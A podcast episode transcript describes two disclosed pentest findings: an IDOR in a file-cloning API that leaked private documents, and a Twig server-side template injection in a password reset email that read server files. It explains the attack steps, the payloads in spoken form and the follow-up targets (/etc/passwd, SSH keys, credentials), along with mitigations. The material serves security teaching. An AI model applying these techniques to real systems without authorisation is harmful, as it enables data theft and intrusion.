
Hacked & Secured: Pentest Exploits & Mitigations
If you know how attacks work, you’ll know exactly where to look—whether you’re breaking in as an ethical hacker or defending as a blue teamer.
Hacked & Secured: Pentest Exploits & Mitigations breaks down real-world pentest findings, exposing how vulnerabilities were discovered, exploited, and mitigated.
Each episode dives into practical security lessons, covering attack chains and creative exploitation techniques used by ethical hackers. Whether you're a pentester, security engineer, developer, or blue teamer, you'll gain actionable insights to apply in your work.
🎧 New episodes every month.
🌍 Follow & Connect → LinkedIn, YouTube, Twitter, Instagram, Website Link
📩 Submit Your Pentest Findings → https://forms.gle/7pPwjdaWnGYpQcA6A
📧 Feedback? Email Us → podcast@quailu.com.au
Hacked & Secured: Pentest Exploits & Mitigations
Ep. 7 – IDOR & SSTI: From File Theft to Server-Side Secrets
A predictable ID exposed private documents. A crafted name leaked backend files.
In this episode, we break down two high-impact flaws—an IDOR that let attackers clone confidential attachments, and an SSTI hidden in an email template that revealed server-side files. Simple inputs, big consequences. Learn how they worked, why they were missed, and how to stop them.
Chapters:
00:00 - INTRO
01:28 - FINDING #1 – IDOR to Steal Confidential Files with Just an Attachment ID
09:05 - FINDING #2 – Server-Side Template Injection That Leaked Local Files
18:41 - OUTRO
Want your pentest discovery featured? Submit your creative findings through the Google Form in the episode description, and we might showcase your finding in an upcoming episode!
🌍 Follow & Connect → LinkedIn, YouTube, Twitter, Instagram
📩 Submit Your Pentest Findings → https://forms.gle/7pPwjdaWnGYpQcA6A
📧 Feedback? Email Us → podcast@quailu.com.au
🔗 Podcast Website → Website Link
INTRO
What if changing just one ID in a URL let you clone confidential documents that were never meant for you to see?
And what if you could go even deeper—exploiting a hidden email template engine to quietly read files straight off the server... just by tweaking your username?
I’m Amin Malekpour, and you’re listening to Hacked & Secured: Pentest Exploits & Mitigations.
Today, we’re breaking down two real-world exploits that required no special tools.
First, an IDOR vulnerability that let attackers steal private files using nothing but a predictable ID.
Then, a clever SSTI that leaked backend files through a password reset email, without ever touching the frontend.
And before we dive in—if you’ve come across something interesting in your own pentests, send it in. We’re always looking to feature interesting findings from the community.
No need to write a full story—just drop the details, and remember to keep client info private. You’ll find the Google Form link in the description.
FINDING #1 – IDOR to Steal Confidential Files with Just an Attachment ID
You upload a file—maybe it’s a medical report, a contract, something personal. You hit submit, and you think, “Alright, that’s secure. Only the right people can access it.”
But what if I told you someone else could download that same file?
No hacking tools. No brute force.
Just by guessing an ID. Crazy, right?
That’s exactly what Oxylis uncovered in a report on HackerOne—
An Insecure Direct Object Reference, or IDOR, that allowed attackers to clone and access private files they were never supposed to see.
Before we get into the attack, let’s quickly break down what IDOR is—for anyone who’s not familiar with it.
Imagine you’re staying at a hotel. You’ve been given Room 305, and your keycard is supposed to open only that room. Now, let’s say the hotel made a big mistake—they never actually check whether your keycard matches the room you’re trying to open. They just assume you’ll only try your own door.
But out of curiosity, you walk up to Room 306, try the same keycard—and it opens. You try 307—same thing, it opens.
No one’s checking if you’re actually allowed in those rooms.
That’s basically what an Insecure Direct Object Reference, or IDOR, looks like.
The app gives you access to something—like a document, invoice, or attachment—using predictable IDs in the URL, like /attachment/123. But it doesn’t really check if that ID belongs to you. It just blindly trusts that if you know the number, you’re authorised.
So what happens if you change 123 in that URL to 124?
In a vulnerable system, it might just hand over someone else’s file—no questions asked.
Alright, let’s get back to the story.
Oxylis was testing a secure online portal—the kind that handles sensitive documents. Medical records, legal files… the kind of data you don’t want falling into the wrong hands.
While poking around, they noticed something odd: the file IDs looked a little too predictable.
doc102, doc103, doc104—that kind of pattern. Simple, sequential, no randomness.
Then, while digging through the network traffic, they spotted something even more interesting:
an internal API—a hidden endpoint that let users clone files.
Here’s how the API worked: you’d give it a file ID, and it would make a copy of that file and attach it to your own profile.
The problem?
It didn’t check ownership.
It did not ask “Are you allowed to access this file?” or “Is this file even yours?” it was vulnerable to Insecure Direct Object Reference.
It just quietly responded:
"File cloned. Here you go."
No alerts. No logs. No questions asked.
Now put yourself in Oxylis’s shoes.
You’ve found an internal API that lets you clone any attachment in the system. No checks. No restrictions.
What would you do next?
• Start testing file IDs tied to high-value profiles and scrape whatever attachments you can find?
• Look for internal documents or reports that might help you pivot deeper into the system?
• Or just automate the whole thing—clone hundreds of files in minutes?
This wasn’t a minor bug.
This was unauthorised access to sensitive data—at scale.
So here’s what Oxylis did:
They crafted a request using the cloning API. Basically telling the system,
“Hey, take this random file ID—say, doc104—and just copy it to my account.”
And the system replied:
"Sure. Give me a second..."
And just like that, it worked.
Once the file was cloned and linked to their profile, they could easily download it like they owned it.
And we’re not just talking profile pictures.
Some of these were deeply private documents—including personal medical records and even classified reports.
Here’s the full attack chain, step by step:
• First, predict or enumerate valid file IDs
• Then, use the internal clone API to copy the file to your own account
• Finally, download it through the normal user-facing endpoint
No errors.
No alerts.
Just access.
You’d think apps wouldn’t still fail like this in 2025.
But they do.
In real-world pentests, IDORs pop up all the time.
Why? Because systems are often built on assumptions like:
• “No one’s going to guess these IDs.” — But they do.
• “Internal APIs aren’t exposed.” — But they usually are.
• “Frontend checks are enough.” — believe me, they never are.
And the trickiest part?
These flaws don’t hide in fancy features. They show up in everyday stuff—like file cloning, shared links, or document previews—places where access checks quietly get skipped.
No fancy exploit needed—just changing a number and walking right in.
So what was the root of the problem here?
Simple. The system made a few critical assumptions:
• It exposed a backend cloning feature without properly securing it.
• It didn’t check whether the user actually owned the file before cloning it.
• And once the file was cloned, it just assumed, “Well, now it’s safe to serve to this new user.”
Here’s how this could’ve been prevented:
• Always validate ownership. Whether it’s cloning, downloading, or sharing, check if the user has the right permission.
• Treat internal APIs like public ones. Just because they’re not exposed in the UI doesn’t mean attackers won’t find them.
• Block access based on IDs unless the user is explicitly linked to that resource.
• And finally, avoid using predictable IDs—use random, unguessable identifiers instead.
This vulnerability didn’t require advanced skills to exploit. It just took someone looking in a place no one else bothered to check.
Alright, fellow pentesters, here’s how you find vulnerabilities like this in your daily engagements:
• When you see predictable IDs—things like attachment IDs, document numbers, or user IDs—don’t just observe them. Start modifying them. Try values just before and after the one you’ve been assigned. Look for patterns. See how far you can go.
• Test every API endpoint you can find, even the weird ones buried in network traffic. Just because it’s undocumented doesn’t mean it’s protected. Some of the best IDORs hide in places developers assume are safe.
• And finally, use tools or scripts to enumerate object IDs at scale. If the format is consistent, automation can help you quickly identify what’s exposed.
Security isn’t just about locking things down. It’s about thinking through how systems behave when users—or attackers—don’t follow the happy path.
Because sometimes, the most dangerous breaches start with the most innocent-looking request. And in this case?
All it took was an ID, a broken controller, and a platform that trusted too easily.
That’s the kind of oversight that leads to full-scale data exposure.
FINDING #2 – Server-Side Template Injection That Leaked Local Files
We started with a stored file being cloned and exfiltrated through a broken object reference.
Then, we saw how a predictable attachment ID led to full document access.
But what if I told you… the next attack didn’t even need predictable URLs or broken logic.
No need to brute-force anything. No need to escalate privileges.
Just one special payload… inserted into your name… that quietly pulled files from the backend server.
This is exactly what r29k reported on Bugcrowd—a Server-Side Template Injection, or SSTI, that gave attackers access to local files on the system.
Before we get into the attack, let’s take a second to break down what SSTI is.
SSTI stands for Server-Side Template Injection, happens when user input is passed directly into a backend template engine without proper sanitisation. Instead of treating that input as plain text, the engine interprets it as code. This lets attackers inject expressions that get executed on the server—starting with small things like math operations, but potentially leading to serious issues like leaking sensitive data or even executing system commands.
Think of it like this: you're at a bakery that uses a system to print custom messages on cakes. You write “Happy Birthday!” and they print it, no problem. But what if someone writes “{{delete_all_orders}}” and the bakery’s system actually runs it instead of just printing it and actually deleting all orders? That’s SSTI—the system trusts input too much, and instead of just displaying it, it executes it.
Alright, let’s get back to the story. r29k was testing a small web app, nothing fancy. Most obvious bugs were patched. Then he noticed something interesting, the Edit Profile page allowed special characters in the name field. That’s always worth testing.
So he tried something simple and changed his name to:
Two opening curly brackets, seven multiply seven in quotes, two closing curly brackets, then space and the word test, and saved it. Let me repeat the payload one more time, two opening curly brackets, seven multiply seven in quotes, two closing curly brackets, then space and the word test.
So here’s where it gets interesting.
After changing his profile name, he expected to see something like “49 test” show up somewhere on the site—maybe in the account settings, maybe in the header. But it didn’t appear anywhere. No reflection on the frontend. No visible output. It looked like a dead end.
Maybe this app was not vulnerable to SSTI, but instead of dropping the test, he thought like an attacker. “Where else could my name show up that I’m not seeing it directly in the browser?” And that’s when it hit him, emails. Specifically, the password reset email.
He headed over to the Forgot Password page and submitted a password reset request for his account. A few seconds later, the reset email landed in his inbox.
And right there in the greeting—“Hello 49”—was the proof of SSTI. The payload had executed. The math operation inside the double curly brackets ran on the server, and the output, 49, was now embedded in the email. That’s when it all clicked. He had found a Server-Side Template Injection vulnerability executing inside the backend email system.
Once he confirmed the payload executed, it was time to move from discovery to exploitation. But here’s the thing—just knowing that the system is vulnerable to SSTI isn’t enough. To go further, you need to know what template engine is running on the backend, because every engine has its own syntax, and knowing the template engine defines what you can do and what payloads will work.
So he kicked off the exploitation phase by throwing in a few test payloads. First, he tried a common test in some template engines to try and run shell commands by treating “system” as a filter. But in this case, the email came back blank—no output at all.
Then he tried another payload used in template engines that expose file-reading functions designed to extract 30 characters from a specific file on the server.
Same result. Blank email.
He tried variations—different functions, different formats—and every time, either the server silently stripped the payload or returned an empty string in the email body.
This told him something important. Either the template engine was sandboxed—meaning dangerous functions were disabled—or the app was silently filtering out certain types of payloads behind the scenes.
But he did not stop and instead of guessing blindly, he did the smart thing: he backed off and started fingerprinting the engine.
He looked at the syntax of the earlier payload—the one that worked and returned hello 49 in the password reset email. That format, especially the use of single quotes inside the double curly brackets, looked a lot like Twig – which is a popular template engine used in a lot of PHP-based web apps.
So he started digging into Twig’s documentation—line by line—looking for exposed functions that could be abused without needing system filters or direct command execution.
And that’s when he found source() function.
This function in Twig is used to include the contents of a template file, and in some configurations, it lets you pass a file path directly. So he crafted a new payload using double curly brackets, wrapping a source function that tries to read the /etc/hosts file.
Then, once again, he triggered a password reset.
And this time, the email didn’t come back empty. It came back with the contents of the hosts file printed right there in the body of the message.
That was it. Proof of file read on the backend server through nothing more than a crafted name and a triggered password reset email.
Let’s pause for a second.
If you had just found an SSTI vulnerability that lets you read any file the server has access to, what would you do next?
Would you…
• Try reading /etc/passwd to fingerprint the environment?
• Look for SSH private keys, API tokens, or secrets sitting in user directories?
• Load internal config files—maybe grab database credentials or email service secrets?
This isn’t just a cool trick. This is deep, backend access—all through a single email template vulnerability.
You’re inside the server’s brain, just by injecting a string.
So how did this even happen?
It all came down to one thing—trusting user input too much.
• The app took input from the user and passed it straight into the template engine—no escaping, no filtering.
• Then, when the email system kicked in, it just rendered that input blindly while generating the message.
• And even though the engine was sandboxed, a function like source() was still available—which meant the attacker could start reading files from the server.
Now, let’s talk about how this could’ve been prevented:
• Never feed raw user input directly into template engines—always escape it or use strict allowlisting.
• In production, lock things down—disable risky functions like source() or anything that allows system access.
• And don’t stop at testing the website. Check the stuff running in the background as well—like email templates, PDF exports, and anything else that quietly uses user data behind the scenes.
Most teams test their main pages for injection. But what about the emails your app sends out every single day?
That’s where bugs like this hide.
And for my fellow pentesters—here’s how you can find vulnerabilities like this during your day-to-day testing:
• Don’t just test the obvious stuff. Go beyond web pages. Look at email templates, PDF exports, and any background features that quietly process user input. That’s where SSTIs love to hide.
• When you find a spot that looks like it's using a template engine, start simple. Try basic math expressions. If you get a calculated response back, you’ve confirmed execution. Then move on to the fun part which is real exploitation.
• Think outside the frontend. R29K found this SSTI in a password reset email, not the site itself. So if you don’t see reflection in the UI, don’t stop. Try places like email content, logs, or even exports. And if you do get reflection? Go further. See if you can read files from the server or call safe system functions.
Template engines were designed to make apps flexible and dynamic.
But the moment user input gets treated as code?
Trust me—the only limit is how far you're willing to push the boundary.
OUTRO
All of the vulnerabilities we covered today were responsibly disclosed—and that matters.
Finding issues is only half the job. Helping teams fix them before attackers exploit them is what truly makes the internet safer for everyone.
If you found this episode valuable, share it with one or two people who’d appreciate it.
Someone in your network might be building an API, writing a template, or skipping access checks, and this episode could be the thing that saves them from making the same mistake.
Let’s make cybersecurity knowledge accessible to all.
See you in the next episode.